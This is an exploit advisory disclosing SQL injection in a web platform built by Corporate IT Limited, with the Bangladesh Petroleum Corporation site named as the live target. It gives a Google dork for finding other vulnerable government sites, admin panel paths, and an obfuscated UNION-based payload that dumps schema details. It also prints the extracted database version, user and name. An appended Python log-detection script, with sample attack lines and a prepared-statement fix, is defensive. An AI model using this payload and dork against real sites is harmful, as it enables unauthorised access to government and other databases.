
Bangladesh Government Petroleum Corporation CorporateitLTD SQL Injection Vulnerability

Author: KingSkrupellos, Published: 10-10-2018
# Exploit Title : Bangladesh Government Petroleum Corporation CorporateitLTD SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : bpc.gov.bd ~ corporateitltd.com ~ citl.com.bd
# Google Dork : intext:''Powered by CORPORATE IT LIMITED'' site:gov.bd
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

/admin/login.php
/admin/index.php
/admin/
uscentral22.myserverhosts.com:2096

# SQL Injection Exploit :

/contactus.php?id=[SQL Injection]

/gallery.php?id=[SQL Injection]

# SQL Injection Exploit Payload =>

/contactus.php?id=17'+and+false+/*!50000UNION*/SELECT+1,2,CoNCat%0A
(0x3c2f7469746c653e3c626f64793e3c62723e3c666f6e7420636f6c6f723d5265642073697a653d333e496e6a33637433642
04279205a656e3c62723e56657273696f6e203a20,version(),0x3c62723e557365722829203a20,user(),0x3c62723e4462617
365203a20,dATAbASe(),(/*!12345sELecT*/(@)/*!50000from*/(/*!12345sELecT*/(@:%3D0x00),(/*!12345sELecT*/
(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)/*!50000where*/(`TAblE_sCHemA`%3DDatAbAsE/*data*/())and
(@)in(@:%3DCoNCat%0A(@,0x3c62723e5461626c6520466f756e64203a20,/*!50000TaBLe_nAMe*/,0x3a3a,/*!
50000column_name*/))))a)),4,5,6,7--+

# Exploit Payload Result Here [ Proof of Concept ] => archive.is/6fOG1

# The Result =>

Version : 5.5.51-38.2
User() : bpcadmin_admin@localhost
Dbase : bpcadmin_bpc

#################################################################################################

# Example Vulnerable Site =>

Bangladesh Government Petroleum Corporation is vulnerable to SQL Injection.

bpc.gov.bd/contactus.php?id=1' [ Proof of Concept for SQL Inj ] => archive.is/PlhBP

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3
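
# Detection Example [ added here, not part of the original advisory ] =>

The following is an added example, not code from the advisory's author or the vendor. It flags the request shapes this advisory describes in web access logs: a non-numeric value in the `id` parameter of `contactus.php` / `gallery.php`, and SQL keywords hidden behind MySQL versioned comments, mixed case and `%0A` whitespace. The rule names, the log format and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example. The two endpoints named in the advisory; both take a numeric id.
NUMERIC_ID_PATHS = {"/contactus.php", "/gallery.php"}
# MySQL runs the body of /*!NNNNN ... */ as SQL, so unwrap it rather than drop it.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
COMMENT = re.compile(r"/\*.*?\*/", re.S)
RULES = {  # hypothetical rule names
    "union-select": re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "schema-enumeration": re.compile(r"\binformation_schema\b"),
    "fingerprint-function": re.compile(r"\b(?:version|user|database)\s*\("),
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = """
203.0.113.7 - - [10/Oct/2018:10:00:01 +0000] "GET /contactus.php?id=17 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2018:10:01:40 +0000] "GET /contactus.php?id=1' HTTP/1.1" 200 310
203.0.113.9 - - [10/Oct/2018:10:02:11 +0000] "GET /gallery.php?id=17'+and+false+/*!50000UNION*/SELECT+1,2,CoNCat%0A(version(),user())--+ HTTP/1.1" 200 9120
203.0.113.9 - - [10/Oct/2018:10:02:30 +0000] "GET /gallery.php?id=3+and+(/*!12345sELecT*/+1+from+%60InFoRMAtiON_sCHeMa%60.%60ColUMNs%60) HTTP/1.1" 200 410
""".strip().splitlines()


def normalize(value: str) -> str:
    """Undo keyword obfuscation so the rules see plain lower-case SQL."""
    value = VERSIONED.sub(r" \1 ", value)   # /*!50000UNION*/ -> UNION
    value = COMMENT.sub(" ", value)         # /*data*/ -> single space
    value = value.replace("`", "")          # drop identifier quoting
    return re.sub(r"\s+", " ", value).lower().strip()


def inspect(log_line: str) -> list[str]:
    """Return the sorted names of the rules a logged request trips."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    hits = set()
    # parse_qsl percent-decodes the value and turns '+' into a space.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "id" and url.path in NUMERIC_ID_PATHS and not value.isdigit():
            hits.add("non-numeric-id")
        text = normalize(value)
        hits.update(rule for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect(line), line.split('"')[1])
```

Log matching only surfaces attempts; the CWE-89 flaw itself is closed by casting `id` to an integer and passing it to the query as a bound parameter of a prepared statement.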

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
